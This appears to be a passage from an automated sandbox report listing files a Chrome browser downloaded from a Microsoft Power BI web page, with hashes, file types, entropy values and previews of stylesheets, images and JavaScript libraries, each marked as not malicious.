                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css
                                                                                                                                                              Preview:.c-uhfh .c-action-trigger.glyph-shopping-cart span:not(.shopping-cart-amount),.c-uhfh .c-action-trigger.glyph-shopping-bag span:not(.shopping-cart-amount){line-height:48px !important}..c-uhfh .c-action-trigger.glyph-shopping-cart:after,.c-uhfh .c-action-trigger.glyph-shopping-bag:after{line-height:43px}..c-uhfh.c-sgl-stck .c-search button{line-height:18px}..msame_Header_name{line-height:44px !important}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):105769
                                                                                                                                                              Entropy (8bit):7.997859231837968
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:56A2EA8158492A9B6323526052794FC3
                                                                                                                                                              SHA1:E219A4F88B35F7D12DBE75E834964454EAB016DF
                                                                                                                                                              SHA-256:6851789ADCF43C7F0DD53522ACED692E337282C87BAED541534B54D06A4B318B
                                                                                                                                                              SHA-512:6E074F0046595595552D238AA0583C7CDA36C46A052D4393E434F7DD86F1A0E32019C56B77C0A17C47554F11651BF1C19CA0A8ED15F2B53FA58D313FCB02B351
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBIPro_5.2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma...................mdat.....*..%....B2...D$..A.P...E....qE.R...G..k.MT..P......Q.D.......90.eF.>.a.6.tiI-.F.zg.W~b..F......."J...+\.>..x.R.m.`........D...*..y..1......K.....l......F.\A.i.J....d>.?.C.:vcK.+G........{}..%..e...Np..n..@q.a...19Y...2%DL.....1s.4.........g.w.$.h.P.q...)..a...V..#....8..55.T....An..A...t...r..y..73)u.x...I.F.V...A4..%...TRw...sJ.K.........?9KT...T.........+Y-."..bm..M..2......Q'<VTU...'@{...E.H.Cd.Q.6p.#*..,...}......iB.b`../....h...n)+.....@.%q...Sy.|J........r.t.T.B:e...U.-=.Rvx.a...T.s..,......Y..UD..{..[W..a.H.s.x.&:.8V.......@.U.D..P...".}$..S..H.Q. .+;'. ....n..\ ...R?b.....}..%..].2&NG.Eo..x3.}...F8..p..Q.A.}._q..f.s...T...X.n.d...EK6L...^..n..B=T.jGr%.....3
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):151765
                                                                                                                                                              Entropy (8bit):7.9985028559152145
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:AA33F44B8179E6B7EB19FC2975783A30
                                                                                                                                                              SHA1:E9AD9BEA85E437AC5D97177B61A3C2A0795E4247
                                                                                                                                                              SHA-256:482E11C9238835F3E5FCE97E51AFCD2803C333D1C9A25239D1A7764035F76243
                                                                                                                                                              SHA-512:2F1A5C178DDA67C204ECF45DF65E254A86279D46BEA78EFBCA4E74FB03D7E52928708F58B6C6C18973FA7CBA9A4959DDD8A2FB3BF5A8680432D050A23A706EF7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/RW14dL8_tbmnl_en-us?scl=1
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............O....(iinf..........infe........av01Color....jiprp...Kipco....ispe...........8....pixi............av1C........colrnclx...........ipma.................O.mdat.....*..7....B2...D...A.P...E..qt6.X..A~B..aS....q.}..'.K.........T...5)O.0-.. ...:.1...?'.......1.SB..'.Cg7...L..(F...._...D .%S..*&..M..3.......^g!>_.l2.F.f.6VV..,.......|v0T:%..N]}.ah.G..|*Y....%?............y.a..{.x....'.....,..p.t"%.3....M.......x.R.n8..&>u...[_..H...3.~V...*..=.B<....{...~...@.YQ....a.W.W}lZ..%....Uk..]U.....U]U......<._...Q6..l.f+..........h...VO. .tX....t......4....l .9V.*.....wr..;..\.?...Lu..{R<....1.[Uj@.+.O.... .F..du...Z.+.....$.r.x~@....J6B&..._f...'H.E.H..J....$M!-...3...4.fh]....MMY;....W.D...?..#.4.Pa.....A]a...1..0....)......}..5j.e...B.v..K=i....v...&.{....Q..Z.A)X...mcHpD..a..z%..1.....(.Hj..8.k.1..[./{....;..T..E..Y.&.H.e.....>M...#5..{...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (32098)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):143130
                                                                                                                                                              Entropy (8bit):5.330341741940889
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B2193EE3D1A572C4DE0275BB103C5293
                                                                                                                                                              SHA1:802AB2E55CE99CE6F37253692F7CFD9229EA65A4
                                                                                                                                                              SHA-256:8EE3C3B99F088F30D5C2CAB98F1688E24D5F9333A164C7610310779EF0EC522A
                                                                                                                                                              SHA-512:E79020F2B363A5D4059745B16597B7796EE24DBDE0AFFE331BE611D149B960630839F9D757938C969F4A2D00CF49995F3152D952A32D7A3E473BC4B8CD10C825
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:/**!.. @license. handlebars v4.7.7..Copyright (C) 2011-2019 by Yehuda Katz..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARI
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (566)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):61208
                                                                                                                                                              Entropy (8bit):5.486865205392623
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F381D5147C85EE687EA8FBEF32C83D37
                                                                                                                                                              SHA1:EB654ABAF1DF5CCB830763D5A40140B5C093C49F
                                                                                                                                                              SHA-256:2D0832B29F1B3347C4B5046C373A635884B76ABAF2DE3FF650EE74D8B46F001E
                                                                                                                                                              SHA-512:CD6B4DEB925037A6C0CF4BAA5AB600891139D99BFB9173D3F3DD4660D281A6266B5709D53770395E7459D9D2060E37F06295E8F9719A21F3EA8433D9E2206E65
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-polyfills.min.ACSHASHf381d5147c85ee687ea8fbef32c83d37.js
                                                                                                                                                              Preview:/*. Copyright (C) 2013-2015 by Andrea Giammarchi - @WebReflection.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (44755), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):44755
                                                                                                                                                              Entropy (8bit):5.388052626258843
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:E3E68C940226C4D15D51792C17ADBE9C
                                                                                                                                                              SHA1:0B030255624C75DD77B015B7FC77949D5E01CD63
                                                                                                                                                              SHA-256:9A8D16CF69B04F17BF869FDC4B81588CDE13C410F37E079820B54E1BAED4BAC7
                                                                                                                                                              SHA-512:F1CB89AFA14C82AA430A62FE5A829003507778DC3292C02A1B580B84AF9465C47A0B72501C1B4E64DE3882837E53123433EDA63B7828F3B41D206E8E9AE99B3F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:window.lpTag=window.lpTag||{};lpTag.firstParty=!0;window.lpTag=window.lpTag||{};window.lpTag.lzString=window.lpTag.lzString||(()=>{var y=String.fromCharCode,r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",o={};function a(e,t){if(!o[e]){o[e]={};for(var r=0;r<e.length;r++)o[e][e.charAt(r)]=r}return o[e][t]}var i={compressToBase64:function(e){if(null==e)return"";var t=i._compress(e,6,function(e){return r.charAt(e)});switch(t.length%4){default:case 0:return t;case 1:return t+"===";case 2:return t+"==";case 3:return t+"="}},decompressFromBase64:function(t){return null==t?"":""==t?null:i._decompress(t.length,32,function(e){return a(r,t.charAt(e))})},compressToUTF16:function(e){return null==e?"":i._compress(e,15,function(e){return y(e+32)})+" "},decompressFromUTF16:function(t){return null==t?"":""==t?null:i._decompress(t.length,16384,function(e){return t.charCodeAt(e)-32})},compressToUint8Array:functio
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):22748
                                                                                                                                                              Entropy (8bit):7.97936926396813
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:E8842769971110AD7D5770549FD2147F
                                                                                                                                                              SHA1:51F4878C2E87CC489106C97B109E571C432BB37B
                                                                                                                                                              SHA-256:E4E089B3C74831C7A49A60C22F89BA73F4E46088282E2196298BA8B9FF6B840A
                                                                                                                                                              SHA-512:C59A7A36D84AACA95CE09F33D1AAF1214EAE7B13327CF9E577E4E2693E5C00CFE46DBE604BEAB6F9768F5C4F9E2C277691CED141C8C1C1269A2CA26B320D16BE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Hero_PBI_opt2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=3200&hei=1000&qlt=100&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............W....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................W.mdat......j......B2...D........E..S8%.Qm..D+....g...L.A...%....GQQgMA...A,.o..y.)..TH.._O..=.....<?.78....S.....mp.W.vo ..../..n.}.\..^..[;....R.....Ol.U.A..)*..].jEhH.&.......2.Ea....m^...c".!5.(.i.b.y# j.Qu)l..i.....@.......t..,h<.0j..t.......IC.4....._3.Z.S...W.+.W.f..U......C...Yd.."....q.[.'..M.K...M..Zt..Z.PG..(.]b.Ip..:.Vm.T......eFE].....Yb-.K.kV.p..-Y.T.._`$...%..}..P.l....%=.'....K..8......B.9....1N.+...7..6u...G_1...>u+(.[..g..e.CF...f.l.Y.9hK..w..3.G..K9?...m_.n?...y.{.M..v.....B..[8.....B..N....t._=.Y.A..4..w.a...z.....Iw.|%.....m....Q......C.x$...)g.^.<.}.yCx8=`i....U.b......f.c.o..^S.)...*$!x5.......[V...?..|.......)5p.Wz1.:.t.1..d.Ko3[..u6............#W..x)0...\.5..&E.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (42133)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):138268
                                                                                                                                                              Entropy (8bit):5.224497765711851
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                                                                              SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                                                                              SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                                                                              SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/shell/_scrf/js/themes=default/54-af9f9f/d4-fb1f57/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/f9-a5b2ce/db-bc0148/dc-7e9864/6d-c07ea1/6f-dafe8c/f6-aa5278/73-a24d00/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/d0-e64f3e/92-10345d/79-499886/7e-cda2d3/58-ab4971/74-d51c79/e0-3c9860/de-884374/1f-100dea/33-abe4df/2b-8e0ae6?ver=2.0&_cf=02242021_3231&iife=1
                                                                                                                                                              Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:C++ source, ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2436
                                                                                                                                                              Entropy (8bit):4.675816652909621
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:3473C7D90BD072EDEE7D20686EB3FD28
                                                                                                                                                              SHA1:82BF670C4E5D3DCF7E4BD8BCAC92A6EED0E87E45
                                                                                                                                                              SHA-256:553B9C191998B0EA72FC6711D6F572C69A812531602EA8C6FFA0F188DFD36423
                                                                                                                                                              SHA-512:974833D87C6295CA5CF485D1B7FE0F88B736F99803F893D858A048B00578D6FEC47A750FA75A4756CDD20571C4DDA0F8BA323E42C70D53E2998BAE61E5D9E33C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:class AjaxUtil {. constructor(opts) {. // Define the base URLs for different environments. const AUTHOR_BASE_URL = {. nonProd: "https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net",. prod: "https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net". };. . // Flag indicating if it's an author or non-author environment. const isAuthor = opts.isAuthor; . . // Flag indicating if it's a production or non-production environment. const isProd = opts.isProd; . . // If the 'host' option is provided, use it as the authorHost value; otherwise, select the appropriate base URL based on the isProd flag. const authorHost = AUTHOR_BASE_URL[isProd ? 'prod' : 'nonProd'];. . // Set the nonAuthorHost value as the origin of the current window. const nonAuthorHost = window.location.origin;. . // Set the baseUrl value based on whether it's an author environment or not. If isAuthor is true, use authorHost; otherwise,
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):221651
                                                                                                                                                              Entropy (8bit):7.999069769809397
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:179949934DC5ACDCED8DAEABF85B36CA
                                                                                                                                                              SHA1:F22A20DFAAC88156AB7C22B34EF16C2B750408D7
                                                                                                                                                              SHA-256:F809942367DBFC8D14AB7123D414CFD097E8BCF2D4B53FAC73E22BDD32B8183F
                                                                                                                                                              SHA-512:2C2553FBAC991DF57B30517F32501B94630D2DBF45CB3BE1D72AA325A2058394382DD279CB76FE99162857FF23C0F232D0C35E76BEA4612EBBE7479309F339B2
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBIinFabric_4.2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............`....(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma.................`.mdat.....*..%..B2............m|.Z.n8..X..l...k....-.b.J;a...-d.....5N..&(..b..4t...JBj.J..M;.j.6....@...'h.'...y.|C ...^..'.}.!R.uMXf.Li.....W)3.P.v.d....e&...F........8..J.....p.gPD\iF....E!6V.Z..vV6J.._p@^.o/....n..i...L.KNj...2.3...E7......z.Y...Z..[..l..@|[....c.x..<.D.G[..}...u_.....jB....&^l.9....^W.!.t...|..B01....'..,.f..Y..q.j...,.......v<..6..YL...NDd.Y..E=.s....=Le....H.8.U.@E.W..a E....g.O.oK....)..{m.C...m.n..-es..0....p.....j..R. .*..%...#7'..^.V.q....v.E).....s$..EX..1.......}.i3A.5...4...}0.X.x.=Gs...d..g.6b.'.=j..........@8..|GpS......h...AH.....?..y...)..3...Z.h......T,D@../..w.sG...A...M^.o..F..N.R.Q..A....l.8.r...i.....-K+/.RJ.V..|.J....!.Z\..tA.....=58...H-Q....d
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):206
                                                                                                                                                              Entropy (8bit):5.069458334688229
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:131D95CF2EC0E511B73B264FA0C84059
                                                                                                                                                              SHA1:10A0E2E7C996B7C482B64B953F0A443672A55CF7
                                                                                                                                                              SHA-256:44A041D41D7F1E7C09AFBCF26471F2370C7182C915633049DDD27229DDBE2C33
                                                                                                                                                              SHA-512:6D90DB6F32278A6507158107EC23F48C700DF46103F1860B9DE0305662A0755CBCF52EC1F35D9289A4BFEBF6C4C88D1E5C2C76E776C12BCB56A8051AA3343EB1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/inline-video/v2/cascade-media-player/clientlibs/site.min.ACSHASH131d95cf2ec0e511b73b264fa0c84059.css
                                                                                                                                                              Preview:/*!..To avoid conflict with MWF styles, added a wrapper class.. */.ump-container{max-width:100%}..ump-sm{width:800px}..ump-md{width:1200px}..ump-lg{width:1600px}..ump-xl{width:1920px}..ump-fill{height:100%}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1722
                                                                                                                                                              Entropy (8bit):4.020777473199425
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F6C2E173ED03C4D085455D33742E305C
                                                                                                                                                              SHA1:99DB9C3858FC6F9CF161485E45FC0A096CB493B2
                                                                                                                                                              SHA-256:2D31B49D3A36A6164F2F57161B0F66C49BD0EC8025EDFA960179A8E0E3249E77
                                                                                                                                                              SHA-512:386D931FDFF9B16E66FE37AF4FA8D96F18618BA77F584A2EBF7C75B87007F6B35999EA4393FF11CEC05FB2BA3E04442E04F8E5D15EEF5BC16E6125869D6123B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Use-Cases5?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:<svg width="24" height="25" viewBox="0 0 24 25" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M12.1129 2.12168C8.88107 2.12168 6.26114 4.73546 6.26114 7.95972C6.26114 9.52666 6.87992 10.9494 7.88699 11.998V12.2755C7.23972 12.119 6.58876 12.104 5.96786 12.2109C5.12795 11.0048 4.63565 9.53962 4.63565 7.95972C4.63565 3.83983 7.98334 0.5 12.1129 0.5C16.2425 0.5 19.5902 3.83983 19.5902 7.95972C19.5902 8.94012 19.4006 9.87635 19.056 10.7339C18.991 10.7173 18.9253 10.7018 18.8589 10.6876L17.4382 10.3834C17.7763 9.64514 17.9647 8.82438 17.9647 7.95972C17.9647 4.73546 15.3448 2.12168 12.1129 2.12168ZM10.8126 7.95972C10.8126 7.24322 11.3948 6.66238 12.113 6.66238C12.8312 6.66238 13.4134 7.24322 13.4134 7.95972V11.8517C13.4134 12.234 13.681 12.5643 14.0556 12.6445L18.2446 13.5416C19.4318 13.7959 20.1606 14.9937 19.8386 16.1618L18.3465 21.5759C18.2236 22.0217 17.8421 22.3486 17.3818 22.4024L13.3227 22.8768C13.2886 22.8808 13.2421 22.8747 13.1825 22.8364C13.1194 22.7957 13.0552 22.7259 1
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):68201
                                                                                                                                                              Entropy (8bit):5.3484131662864085
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2F69925FFCA908D1AE92A663E2651EC9
                                                                                                                                                              SHA1:58C99ED7CB06039EA0B2D4ADE82F69CBC8CB6DFC
                                                                                                                                                              SHA-256:E57F584DC164284E3994776F7DDD7DE42D54921A30F096CA971F676B2F5942C7
                                                                                                                                                              SHA-512:DEB67EDB81F9B365F1B80B02D4F06E66E0DF27EA8FA1CFF5195E14F4BB6ED5B4C7DCB079CFA1190C20B7DC46AC898D7C64B7D1BA7382815E7B144C2C62FFB816
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.clarity.ms/s/0.7.58/clarity.js
                                                                                                                                                              Preview:/* clarity-js v0.7.58: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return yr},get start(){return mr},get stop(){return br},get track(){return fr}}),e=Object.freeze({__proto__:null,get clone(){return Wr},get compute(){return Xr},get data(){return Dr},get keys(){return jr},get reset(){return Yr},get start(){return zr},get stop(){return Ur},get trigger(){return Hr},get update(){return qr}}),n=Object.freeze({__proto__:null,get check(){return Kr},get compute(){return Qr},get data(){return Cr},get start(){return Gr},get stop(){return $r},get trigger(){return Zr}}),a=Object.freeze({__proto__:null,get compute(){return oi},get data(){return ti},get log(){return ii},get reset(){return ui},get start(){return ai},get stop(){return ri},get updates(){return ei}}),r=Object.freeze({__proto__:null,get callback(){return bi},get callbacks(){return li},get clear(){return yi},get consent(){return mi},get data(){return si},
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):9539
                                                                                                                                                              Entropy (8bit):4.727148213062689
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:9EEA5F80FED74A300CCBBAA4DC41DF2A
                                                                                                                                                              SHA1:08568A33ED8E994237DB997AFABF85723AD7E92D
                                                                                                                                                              SHA-256:32E9B0F50257F381F3F1F3002B7DFD3AF138916429D53FAAC58FD9D0D1550CF4
                                                                                                                                                              SHA-512:0114AC63E722B5628605986B2F2A483F2822CE043F988638DE3DEE202BA96D91B5AE723D585558540A123C9978BEC169C90FF98E567ED74053D57EDE7F1340DB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-action.min.ACSHASH9eea5f80fed74a300ccbbaa4dc41df2a.js
                                                                                                                                                              Preview:/**.* This function is to add source parameter through JS in the hyperlink..*/.$(document).ready(function () {. const appendReferrerLinks = document.querySelectorAll('[data-isautoappendreferrer="true"]');. if (appendReferrerLinks.length) {. const lang = "/" + document.documentElement.lang?.toLowerCase();. let currentUrl = window.location.href.toLowerCase().replace(window.location.search, "").replace(lang, "");. if (currentUrl.endsWith("/")) {. .currentUrl = currentUrl.slice(0, -1);. }. const sourceLink = "srcurl=" + encodeURIComponent(currentUrl);. appendReferrerLinks.forEach(link => {. if (!link.href.includes("srcurl=")) {. const separator = link.href.includes("?") ? "&" : "?";. link.href = link.href + separator + sourceLink;. }. });. }.});./**. * Query Parameter Passthrough Utility. *. * This utility updates anchor tags in a web page by modifying the. * 'href' attribut
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (26038)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1074949
                                                                                                                                                              Entropy (8bit):5.534453277745198
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:26E991089BD1F8A06E99A0E175BBA17D
                                                                                                                                                              SHA1:853D7A212931E25E386FC93C74406C97FC0D1750
                                                                                                                                                              SHA-256:8B3213F37C7B8A8FF444A97EFA4F783C34B36521B31F98C57671A9642B5D40AF
                                                                                                                                                              SHA-512:E06F49F81E854C8856480C2419BFD66199D350C70A1D4B8A81FB6464209A4C2E4C3385A7828C545613A20EE25F9230619D30763A58BB4D14D0E569285DB822B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:// Universal Media Player.// Build Date: 2024-12-11T21:06:34.160Z.// Commit: 2e7813bfaa2d91235468f225d9a635f36570dd33.// Build Number: 20241211.02../**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let U8=class extends Event{constructor(a,s,l){super("context-request",{bubbles:!0,composed:!0}),this.context=a,this.callback=s,this.subscribe=l??!1}};/**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. *//**. * @license. * Copyright 2021 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */let O8=class{constructor(a,s,l,p){if(this.subscribe=!1,this.provided=!1,this.value=void 0,this.t=(d,m)=>{this.unsubscribe&&(this.unsubscribe!==m&&(this.provided=!1,this.unsubscribe()),this.subscribe||this.unsubscribe()),this.value=d,this.host.requestUpdate(),this.provided&&!this.subscribe||(this.provided=!0,this.callback&&this.callback(d,m)),this.unsubscribe=m},this.host=a,s.context!==void 0){const d=s;this.context=d.context,this.c
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):78984
                                                                                                                                                              Entropy (8bit):7.995219246701741
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2820AE1CE72DD1F5263EBFB4D79B128D
                                                                                                                                                              SHA1:F9B27191866FE4B967409B0E6003D38EBDFD7F6E
